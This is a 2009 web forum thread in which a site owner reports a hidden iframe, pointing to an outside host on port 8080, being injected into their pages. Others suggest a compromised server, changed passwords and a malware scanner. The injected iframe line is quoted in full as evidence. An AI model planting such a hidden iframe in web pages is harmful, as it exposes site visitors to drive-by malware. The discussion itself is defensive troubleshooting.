07-27-2009, 02:12 AM
lately this has been embedding itself into a number of pages (cutting off original coding and therefore disrupting the page):
<iframe src="http://xg8.in:8080/index.php" width=158 height=197 style="visibility: hidden"></iframe>
i'm going to change the cpanel and ftp passwords but i have no clue what the heck this is. all my googling returns results in foreign languages, but i do spy the word "malware." any help is appreciated!
07-27-2009, 02:58 AM
It could also be that your server is compromised or you have some server side code that has some vulnerabilities. Do you have any code that allows user uploads?
07-27-2009, 06:12 AM
nope, no such coding (i'm pretty sure). you can check out the site here:
if the server's been compromised, do you think resetting passwords and such will solve it or is there any other action i can do to fix it?
edit actually, now that i think about it, could someone be going through the contact form? it seems a little far fetched because the inserted code has been on various pages, mostly unrelated to the contact page, so i'm not sure how a person could manage to post the code in such varied locations.
07-27-2009, 08:39 AM
From what I've been reading it seems that your system might be compromised.
I know its not a .cn domain but the author says it applies to other domains too. Read the how to clean up part.
The free version of Malwarebytes Anti-Malware should find the problem if there is one:
07-28-2009, 08:20 PM
thanks for the help; hopefully this will solve it. :]